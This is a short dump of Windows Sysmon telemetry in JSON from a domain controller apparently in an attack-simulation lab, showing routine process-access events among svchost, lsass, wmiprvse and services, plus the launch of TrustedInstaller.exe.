{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1068,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1069,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1070,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1071,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1072,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.156\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.156","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1073,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.156\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.156","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1074,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1075,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.164\r\nProcessGuid: {A837DB8D-01BB-5F25-0000-00100E6D0200}\r\nProcessId: 2968\r\nImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nFileVersion: 10.0.14393.3564 (rs1_release.200303-1942)\r\nDescription: Windows Modules Installer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: TrustedInstaller.exe\r\nCommandLine: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.164","ProcessGuid":"{A837DB8D-01BB-5F25-0000-00100E6D0200}","Image":"C:\\Windows\\servicing\\TrustedInstaller.exe","FileVersion":"10.0.14393.3564 (rs1_release.200303-1942)","Description":"Windows Modules Installer","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"TrustedInstaller.exe","CommandLine":"C:\\Windows\\servicing\\TrustedInstaller.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
